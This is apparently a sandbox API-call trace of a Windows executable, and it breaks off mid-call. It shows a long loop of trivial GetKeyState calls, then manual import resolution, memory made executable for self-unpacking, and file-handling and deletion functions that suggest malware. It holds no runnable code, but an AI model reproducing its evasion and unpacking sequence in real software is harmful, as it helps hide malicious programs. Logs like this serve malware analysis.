[0092.082] GetKeyState (nVirtKey=1) returned 0 [0092.082] GetStretchBltMode (hdc=0x1) returned 0 [0092.082] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.082] GetKeyState (nVirtKey=1) returned 0 [0092.082] GetStretchBltMode (hdc=0x1) returned 0 [0092.082] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.082] GetKeyState (nVirtKey=1) returned 0 [0092.082] GetStretchBltMode (hdc=0x1) returned 0 [0092.082] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.082] GetKeyState (nVirtKey=1) returned 0 [0092.082] GetStretchBltMode (hdc=0x1) returned 0 [0092.082] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.082] GetKeyState (nVirtKey=1) returned 0 [0092.082] GetStretchBltMode (hdc=0x1) returned 0 [0092.082] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.082] GetKeyState (nVirtKey=1) returned 0 [0092.082] GetStretchBltMode (hdc=0x1) returned 0 [0092.083] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.083] GetKeyState (nVirtKey=1) returned 0 [0092.083] GetStretchBltMode (hdc=0x1) returned 0 [0092.083] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.083] GetKeyState (nVirtKey=1) returned 0 [0092.083] GetStretchBltMode (hdc=0x1) returned 0 [0092.083] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.083] GetKeyState (nVirtKey=1) returned 0 [0092.083] GetStretchBltMode (hdc=0x1) returned 0 [0092.083] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.083] GetKeyState (nVirtKey=1) returned 0 [0092.083] GetStretchBltMode (hdc=0x1) returned 0 [0092.083] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.083] GetKeyState (nVirtKey=1) returned 0 [0092.083] GetStretchBltMode (hdc=0x1) returned 0 [0092.083] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.083] GetKeyState (nVirtKey=1) returned 0 [0092.083] GetStretchBltMode (hdc=0x1) returned 0 [0092.083] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.084] GetKeyState (nVirtKey=1) returned 0 [0092.084] GetStretchBltMode (hdc=0x1) returned 0 [0092.084] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.084] GetKeyState (nVirtKey=1) returned 0 [0092.084] GetStretchBltMode (hdc=0x1) returned 0 [0092.084] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.084] GetKeyState (nVirtKey=1) returned 0 [0092.084] GetStretchBltMode (hdc=0x1) returned 0 [0092.084] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.084] GetKeyState (nVirtKey=1) returned 0 [0092.084] GetStretchBltMode (hdc=0x1) returned 0 [0092.084] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.084] GetKeyState (nVirtKey=1) returned 0 [0092.084] GetStretchBltMode (hdc=0x1) returned 0 [0092.084] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.084] GetKeyState (nVirtKey=1) returned 0 [0092.084] GetStretchBltMode (hdc=0x1) returned 0 [0092.084] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.084] GetKeyState (nVirtKey=1) returned 0 [0092.084] GetStretchBltMode (hdc=0x1) returned 0 [0092.085] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.085] GetKeyState (nVirtKey=1) returned 0 [0092.085] GetStretchBltMode (hdc=0x1) returned 0 [0092.085] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.085] GetKeyState (nVirtKey=1) returned 0 [0092.085] GetStretchBltMode (hdc=0x1) returned 0 [0092.085] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.085] GetKeyState (nVirtKey=1) returned 0 [0092.085] GetStretchBltMode (hdc=0x1) returned 0 [0092.085] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.085] GetKeyState (nVirtKey=1) returned 0 [0092.085] GetStretchBltMode (hdc=0x1) returned 0 [0092.085] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.085] GetKeyState (nVirtKey=1) returned 0 [0092.085] GetStretchBltMode (hdc=0x1) returned 0 [0092.085] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.085] GetKeyState (nVirtKey=1) returned 0 [0092.085] GetStretchBltMode (hdc=0x1) returned 0 [0092.085] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.085] GetKeyState (nVirtKey=1) returned 0 [0092.086] GetStretchBltMode (hdc=0x1) returned 0 [0092.086] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.086] GetKeyState (nVirtKey=1) returned 0 [0092.086] GetStretchBltMode (hdc=0x1) returned 0 [0092.086] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.086] GetKeyState (nVirtKey=1) returned 0 [0092.086] GetStretchBltMode (hdc=0x1) returned 0 [0092.086] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.086] GetKeyState (nVirtKey=1) returned 0 [0092.086] GetStretchBltMode (hdc=0x1) returned 0 [0092.086] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.086] GetKeyState (nVirtKey=1) returned 0 [0092.086] GetStretchBltMode (hdc=0x1) returned 0 [0092.086] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.086] GetKeyState (nVirtKey=1) returned 0 [0092.086] GetStretchBltMode (hdc=0x1) returned 0 [0092.086] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.086] GetKeyState (nVirtKey=1) returned 0 [0092.086] GetStretchBltMode (hdc=0x1) returned 0 [0092.086] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.087] GetKeyState (nVirtKey=1) returned 0 [0092.087] GetStretchBltMode (hdc=0x1) returned 0 [0092.087] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.087] GetKeyState (nVirtKey=1) returned 0 [0092.087] GetStretchBltMode (hdc=0x1) returned 0 [0092.087] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.087] GetKeyState (nVirtKey=1) returned 0 [0092.087] GetStretchBltMode (hdc=0x1) returned 0 [0092.087] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.087] GetKeyState (nVirtKey=1) returned 0 [0092.087] GetStretchBltMode (hdc=0x1) returned 0 [0092.087] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.087] GetKeyState (nVirtKey=1) returned 0 [0092.087] GetStretchBltMode (hdc=0x1) returned 0 [0092.087] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.087] GetKeyState (nVirtKey=1) returned 0 [0092.087] GetStretchBltMode (hdc=0x1) returned 0 [0092.087] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.087] GetKeyState (nVirtKey=1) returned 0 [0092.087] GetStretchBltMode (hdc=0x1) returned 0 [0092.088] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.088] GetKeyState (nVirtKey=1) returned 0 [0092.088] GetStretchBltMode (hdc=0x1) returned 0 [0092.088] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.088] GetKeyState (nVirtKey=1) returned 0 [0092.088] GetStretchBltMode (hdc=0x1) returned 0 [0092.088] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.088] GetKeyState (nVirtKey=1) returned 0 [0092.088] GetStretchBltMode (hdc=0x1) returned 0 [0092.088] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.088] GetKeyState (nVirtKey=1) returned 0 [0092.088] GetStretchBltMode (hdc=0x1) returned 0 [0092.088] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.088] GetKeyState (nVirtKey=1) returned 0 [0092.088] GetStretchBltMode (hdc=0x1) returned 0 [0092.088] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.088] GetKeyState (nVirtKey=1) returned 0 [0092.088] GetStretchBltMode (hdc=0x1) returned 0 [0092.094] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.094] GetKeyState (nVirtKey=1) returned 0 [0092.094] GetStretchBltMode (hdc=0x1) returned 0 [0092.094] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.094] GetKeyState (nVirtKey=1) returned 0 [0092.094] GetStretchBltMode (hdc=0x1) returned 0 [0092.094] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.095] GetKeyState (nVirtKey=1) returned 0 [0092.095] GetStretchBltMode (hdc=0x1) returned 0 [0092.095] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.095] GetKeyState (nVirtKey=1) returned 0 [0092.095] GetStretchBltMode (hdc=0x1) returned 0 [0092.095] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.095] GetKeyState (nVirtKey=1) returned 0 [0092.095] GetStretchBltMode (hdc=0x1) returned 0 [0092.095] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.095] GetKeyState (nVirtKey=1) returned 0 [0092.095] GetStretchBltMode (hdc=0x1) returned 0 [0092.095] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.095] GetKeyState (nVirtKey=1) returned 0 [0092.095] GetStretchBltMode (hdc=0x1) returned 0 [0092.095] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.095] GetKeyState (nVirtKey=1) returned 0 [0092.095] GetStretchBltMode (hdc=0x1) returned 0 [0092.095] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.095] GetKeyState (nVirtKey=1) returned 0 [0092.095] GetStretchBltMode (hdc=0x1) returned 0 [0092.096] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.096] GetKeyState (nVirtKey=1) returned 0 [0092.096] GetStretchBltMode (hdc=0x1) returned 0 [0092.096] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.096] GetKeyState (nVirtKey=1) returned 0 [0092.096] GetStretchBltMode (hdc=0x1) returned 0 [0092.096] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.096] GetKeyState (nVirtKey=1) returned 0 [0092.096] GetStretchBltMode (hdc=0x1) returned 0 [0092.096] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.096] GetKeyState (nVirtKey=1) returned 0 [0092.096] GetStretchBltMode (hdc=0x1) returned 0 [0092.096] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.096] GetKeyState (nVirtKey=1) returned 0 [0092.096] GetStretchBltMode (hdc=0x1) returned 0 [0092.096] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.096] GetKeyState (nVirtKey=1) returned 0 [0092.096] GetStretchBltMode (hdc=0x1) returned 0 [0092.096] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.097] GetKeyState (nVirtKey=1) returned 0 [0092.097] GetStretchBltMode (hdc=0x1) returned 0 [0092.097] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.097] GetKeyState (nVirtKey=1) returned 0 [0092.097] GetStretchBltMode (hdc=0x1) returned 0 [0092.097] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.097] GetKeyState (nVirtKey=1) returned 0 [0092.097] GetStretchBltMode (hdc=0x1) returned 0 [0092.097] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.097] GetKeyState (nVirtKey=1) returned 0 [0092.097] GetStretchBltMode (hdc=0x1) returned 0 [0092.097] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.097] GetKeyState (nVirtKey=1) returned 0 [0092.097] GetStretchBltMode (hdc=0x1) returned 0 [0092.097] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.097] GetKeyState (nVirtKey=1) returned 0 [0092.097] GetStretchBltMode (hdc=0x1) returned 0 [0092.097] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.097] GetKeyState (nVirtKey=1) returned 0 [0092.097] GetStretchBltMode (hdc=0x1) returned 0 [0092.097] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.098] GetKeyState (nVirtKey=1) returned 0 [0092.098] GetStretchBltMode (hdc=0x1) returned 0 [0092.098] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.098] GetKeyState (nVirtKey=1) returned 0 [0092.098] GetStretchBltMode (hdc=0x1) returned 0 [0092.098] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.098] GetKeyState (nVirtKey=1) returned 0 [0092.098] GetStretchBltMode (hdc=0x1) returned 0 [0092.098] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.098] GetKeyState (nVirtKey=1) returned 0 [0092.098] GetStretchBltMode (hdc=0x1) returned 0 [0092.098] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.098] GetKeyState (nVirtKey=1) returned 0 [0092.098] GetStretchBltMode (hdc=0x1) returned 0 [0092.098] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.098] GetKeyState (nVirtKey=1) returned 0 [0092.098] GetStretchBltMode (hdc=0x1) returned 0 [0092.098] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.098] GetKeyState (nVirtKey=1) returned 0 [0092.099] GetStretchBltMode (hdc=0x1) returned 0 [0092.099] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.099] GetKeyState (nVirtKey=1) returned 0 [0092.099] GetStretchBltMode (hdc=0x1) returned 0 [0092.099] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.099] GetKeyState (nVirtKey=1) returned 0 [0092.099] GetStretchBltMode (hdc=0x1) returned 0 [0092.099] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.099] GetKeyState (nVirtKey=1) returned 0 [0092.099] GetStretchBltMode (hdc=0x1) returned 0 [0092.099] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.099] GetKeyState (nVirtKey=1) returned 0 [0092.099] GetStretchBltMode (hdc=0x1) returned 0 [0092.099] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.099] GetKeyState (nVirtKey=1) returned 0 [0092.099] GetStretchBltMode (hdc=0x1) returned 0 [0092.099] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.099] GetKeyState (nVirtKey=1) returned 0 [0092.099] GetStretchBltMode (hdc=0x1) returned 0 [0092.099] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.100] GetKeyState (nVirtKey=1) returned 0 [0092.100] GetStretchBltMode (hdc=0x1) returned 0 [0092.100] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.100] GetKeyState (nVirtKey=1) returned 0 [0092.100] GetStretchBltMode (hdc=0x1) returned 0 [0092.100] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.100] GetKeyState (nVirtKey=1) returned 0 [0092.100] GetStretchBltMode (hdc=0x1) returned 0 [0092.100] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.100] GetKeyState (nVirtKey=1) returned 0 [0092.100] GetStretchBltMode (hdc=0x1) returned 0 [0092.100] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.100] GetKeyState (nVirtKey=1) returned 0 [0092.100] GetStretchBltMode (hdc=0x1) returned 0 [0092.100] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.100] GetKeyState (nVirtKey=1) returned 0 [0092.100] GetStretchBltMode (hdc=0x1) returned 0 [0092.100] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.100] GetKeyState (nVirtKey=1) returned 0 [0092.100] GetStretchBltMode (hdc=0x1) returned 0 [0092.100] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.101] GetKeyState (nVirtKey=1) returned 0 [0092.101] GetStretchBltMode (hdc=0x1) returned 0 [0092.101] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.101] GetKeyState (nVirtKey=1) returned 0 [0092.101] GetStretchBltMode (hdc=0x1) returned 0 [0092.101] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.101] GetKeyState (nVirtKey=1) returned 0 [0092.101] GetStretchBltMode (hdc=0x1) returned 0 [0092.101] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.101] GetKeyState (nVirtKey=1) returned 0 [0092.101] GetStretchBltMode (hdc=0x1) returned 0 [0092.101] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.101] GetKeyState (nVirtKey=1) returned 0 [0092.101] GetStretchBltMode (hdc=0x1) returned 0 [0092.101] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.101] GetKeyState (nVirtKey=1) returned 0 [0092.101] GetStretchBltMode (hdc=0x1) returned 0 [0092.101] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.101] GetKeyState (nVirtKey=1) returned 0 [0092.101] GetStretchBltMode (hdc=0x1) returned 0 [0092.102] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.102] GetKeyState (nVirtKey=1) returned 0 [0092.102] GetStretchBltMode (hdc=0x1) returned 0 [0092.102] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.102] GetKeyState (nVirtKey=1) returned 0 [0092.102] GetStretchBltMode (hdc=0x1) returned 0 [0092.102] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.102] GetKeyState (nVirtKey=1) returned 0 [0092.102] GetStretchBltMode (hdc=0x1) returned 0 [0092.102] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.102] GetKeyState (nVirtKey=1) returned 0 [0092.102] GetStretchBltMode (hdc=0x1) returned 0 [0092.102] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.102] GetKeyState (nVirtKey=1) returned 0 [0092.102] GetStretchBltMode (hdc=0x1) returned 0 [0092.102] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.102] GetKeyState (nVirtKey=1) returned 0 [0092.102] GetStretchBltMode (hdc=0x1) returned 0 [0092.102] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.102] GetKeyState (nVirtKey=1) returned 0 [0092.103] GetStretchBltMode (hdc=0x1) returned 0 [0092.103] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.103] GetKeyState (nVirtKey=1) returned 0 [0092.103] GetStretchBltMode (hdc=0x1) returned 0 [0092.103] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.103] GetKeyState (nVirtKey=1) returned 0 [0092.103] GetStretchBltMode (hdc=0x1) returned 0 [0092.103] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.103] GetKeyState (nVirtKey=1) returned 0 [0092.103] GetStretchBltMode (hdc=0x1) returned 0 [0092.103] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.103] GetKeyState (nVirtKey=1) returned 0 [0092.103] GetStretchBltMode (hdc=0x1) returned 0 [0092.103] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.103] GetKeyState (nVirtKey=1) returned 0 [0092.103] GetStretchBltMode (hdc=0x1) returned 0 [0092.103] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.103] GetKeyState (nVirtKey=1) returned 0 [0092.103] GetStretchBltMode (hdc=0x1) returned 0 [0092.103] GetListBoxInfo (hwnd=0x0) returned 0x0 [0092.104] GetKeyState (nVirtKey=1) returned 0 [0092.104] GetStretchBltMode (hdc=0x1) returned 0 [0092.104] GetListBoxInfo (hwnd=0x0) returned 0x0 [0093.004] GetProcAddress (hModule=0x74bc0000, lpProcName="LoadLibraryExA") returned 0x74ca6040 [0093.005] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x772d0000 [0093.005] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0093.006] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualAlloc") returned 0x772e6970 [0093.006] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualFree") returned 0x772e69d0 [0093.006] GetProcAddress (hModule=0x772d0000, lpProcName="UnmapViewOfFile") returned 0x772e68f0 [0093.006] GetProcAddress (hModule=0x772d0000, lpProcName="VirtualProtect") returned 0x772e6a30 [0093.006] GetProcAddress (hModule=0x772d0000, lpProcName="LoadLibraryExA") returned 0x772e5aa0 [0093.006] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0093.006] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleW") returned 0x772e50d0 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileA") returned 0x7733ed00 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="GetTempPathA") returned 0x7733efe0 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcatA") returned 0x773270c0 [0093.007] GetProcAddress (hModule=0x772d0000, lpProcName="FreeLibrary") returned 0x772e4c40 [0093.007] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0093.008] GetProcAddress (hModule=0x74bc0000, lpProcName="VirtualAlloc") returned 0x74cb54c0 [0093.008] VirtualAlloc (lpAddress=0x0, dwSize=0xe200, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0093.010] VirtualProtect (in: lpAddress=0x400000, dwSize=0x11000, flNewProtect=0x40, lpflOldProtect=0x19fbc4 | out: lpflOldProtect=0x19fbc4*=0x2) returned 1 [0093.101] LoadLibraryExA (lpLibFileName="ntdll.dll", hFile=0x0, dwFlags=0x0) returned 0x77970000 [0093.101] GetProcAddress (hModule=0x77970000, lpProcName="NtClose") returned 0x779e1de0 [0093.101] GetProcAddress (hModule=0x77970000, lpProcName="NtCreateFile") returned 0x779e2260 [0093.101] GetProcAddress (hModule=0x77970000, lpProcName="RtlInitUnicodeString") returned 0x779e42f0 [0093.101] GetProcAddress (hModule=0x77970000, lpProcName="NtMapViewOfSection") returned 0x779e1f90 [0093.102] GetProcAddress (hModule=0x77970000, lpProcName="NtFsControlFile") returned 0x779e20a0 [0093.102] GetProcAddress (hModule=0x77970000, lpProcName="RtlImageNtHeader") returned 0x779bb4e0 [0093.102] GetProcAddress (hModule=0x77970000, lpProcName="RtlUnwind") returned 0x779d2d30 [0093.102] GetProcAddress (hModule=0x77970000, lpProcName="_chkstk") returned 0x779e5780 [0093.102] GetProcAddress (hModule=0x77970000, lpProcName="memset") returned 0x779e8190 [0093.102] GetProcAddress (hModule=0x77970000, lpProcName="memcpy") returned 0x779e7b00 [0093.102] GetProcAddress (hModule=0x77970000, lpProcName="RtlNtStatusToDosError") returned 0x779c5730 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="wcschr") returned 0x779e9950 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="memcmp") returned 0x779e7aa0 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="NtUnmapViewOfSection") returned 0x779e1fb0 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="NtDeleteFile") returned 0x779e29b0 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="_snprintf") returned 0x779e63a0 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="_wcslwr") returned 0x779e6c20 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="_snwprintf") returned 0x779e6450 [0093.103] GetProcAddress (hModule=0x77970000, lpProcName="NtOpenSection") returned 0x779e2080 [0093.104] GetProcAddress (hModule=0x77970000, lpProcName="_allmul") returned 0x779e5740 [0093.104] GetProcAddress (hModule=0x77970000, lpProcName="_aulldiv") returned 0x779e5960 [0093.104] GetProcAddress (hModule=0x77970000, lpProcName="_aulldvrm") returned 0x779e59d0 [0093.104] GetProcAddress (hModule=0x77970000, lpProcName="NtQueryVirtualMemory") returned 0x779e1f40 [0093.104] LoadLibraryExA (lpLibFileName="SHLWAPI.dll", hFile=0x0, dwFlags=0x0) returned 0x76ba0000 [0093.104] GetProcAddress (hModule=0x76ba0000, lpProcName="PathCombineW") returned 0x76bb8890 [0093.105] GetProcAddress (hModule=0x76ba0000, lpProcName="StrToIntExW") returned 0x76bb77c0 [0093.105] GetProcAddress (hModule=0x76ba0000, lpProcName="StrTrimW") returned 0x76bb7300 [0093.105] GetProcAddress (hModule=0x76ba0000, lpProcName="StrRChrW") returned 0x76bb84a0 [0093.105] GetProcAddress (hModule=0x76ba0000, lpProcName="StrStrW") returned 0x76bb7850 [0093.105] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFileExistsW") returned 0x76bb4660 [0093.105] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFindFileNameW") returned 0x76bb3c60 [0093.105] GetProcAddress (hModule=0x76ba0000, lpProcName="StrCmpNW") returned 0x76bb2800 [0093.106] GetProcAddress (hModule=0x76ba0000, lpProcName="PathFindExtensionW") returned 0x76bb3c20 [0093.106] GetProcAddress (hModule=0x76ba0000, lpProcName="StrChrW") returned 0x76bb27c0 [0093.106] LoadLibraryExA (lpLibFileName="KERNEL32.dll", hFile=0x0, dwFlags=0x0) returned 0x772d0000 [0093.106] GetProcAddress (hModule=0x772d0000, lpProcName="SetEndOfFile") returned 0x7733f0e0 [0093.106] GetProcAddress (hModule=0x772d0000, lpProcName="SetUnhandledExceptionFilter") returned 0x772e6720 [0093.107] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0093.107] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0093.107] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForSingleObject") returned 0x7733eca0 [0093.107] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcatW") returned 0x773271a0 [0093.107] GetProcAddress (hModule=0x772d0000, lpProcName="SetEvent") returned 0x7733ec50 [0093.107] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentThreadId") returned 0x772e8820 [0093.107] GetProcAddress (hModule=0x772d0000, lpProcName="ExitThread") returned 0x779d6390 [0093.108] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenW") returned 0x772e6c70 [0093.108] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0093.108] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteFileW") returned 0x7733ed40 [0093.108] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcessId") returned 0x7733ea20 [0093.108] GetProcAddress (hModule=0x772d0000, lpProcName="GetLastError") returned 0x772e5010 [0093.108] GetProcAddress (hModule=0x772d0000, lpProcName="SetFilePointer") returned 0x7733f120 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcAddress") returned 0x772e51b0 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="GetDiskFreeSpaceExW") returned 0x7733eea0 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcpyW") returned 0x77327140 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="SetFileAttributesW") returned 0x7733f100 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="WriteFile") returned 0x7733f180 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="MoveFileW") returned 0x7731e500 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="HeapAlloc") returned 0x779b2dc0 [0093.109] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedIncrement") returned 0x772e7420 [0093.110] GetProcAddress (hModule=0x772d0000, lpProcName="HeapFree") returned 0x772e57f0 [0093.110] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileW") returned 0x7733f3b0 [0093.110] GetProcAddress (hModule=0x772d0000, lpProcName="ExitProcess") returned 0x772e3cb0 [0093.110] GetProcAddress (hModule=0x772d0000, lpProcName="GetCommandLineW") returned 0x772e4cc0 [0093.110] GetProcAddress (hModule=0x772d0000, lpProcName="CreateEventA") returned 0x7733eb00 [0093.110] GetProcAddress (hModule=0x772d0000, lpProcName="GetProcessHeap") returned 0x772e51f0 [0093.111] GetProcAddress (hModule=0x772d0000, lpProcName="GetModuleHandleA") returned 0x772e50b0 [0093.111] GetProcAddress (hModule=0x772d0000, lpProcName="GetSystemTimeAsFileTime") returned 0x772e5530 [0093.111] GetProcAddress (hModule=0x772d0000, lpProcName="lstrcmpW") returned 0x772e6bb0 [0093.111] GetProcAddress (hModule=0x772d0000, lpProcName="GetVersion") returned 0x772e56c0 [0093.111] GetProcAddress (hModule=0x772d0000, lpProcName="WaitForMultipleObjects") returned 0x7733ec80 [0093.111] GetProcAddress (hModule=0x772d0000, lpProcName="CreateThread") returned 0x772e46b0 [0093.111] GetProcAddress (hModule=0x772d0000, lpProcName="Sleep") returned 0x772e6760 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="CreateProcessW") returned 0x772e4610 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="GetExitCodeProcess") returned 0x772e3c60 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="CreateDirectoryW") returned 0x7733ece0 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="TerminateProcess") returned 0x772e67e0 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="lstrlenA") returned 0x772e6c50 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="InitializeCriticalSection") returned 0x779caf20 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="DeleteCriticalSection") returned 0x7799fb90 [0093.112] GetProcAddress (hModule=0x772d0000, lpProcName="FindNextFileW") returned 0x7733ee40 [0093.113] GetProcAddress (hModule=0x772d0000, lpProcName="ResetEvent") returned 0x7733ec40 [0093.113] GetProcAddress (hModule=0x772d0000, lpProcName="InterlockedDecrement") returned 0x772e73c0 [0093.113] GetProcAddress (hModule=0x772d0000, lpProcName="FindClose") returned 0x7733ed70 [0093.113] GetProcAddress (hModule=0x772d0000, lpProcName="EnterCriticalSection") returned 0x779bb2d0 [0093.113] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentDirectoryW") returned 0x772e4e80 [0093.113] GetProcAddress (hModule=0x772d0000, 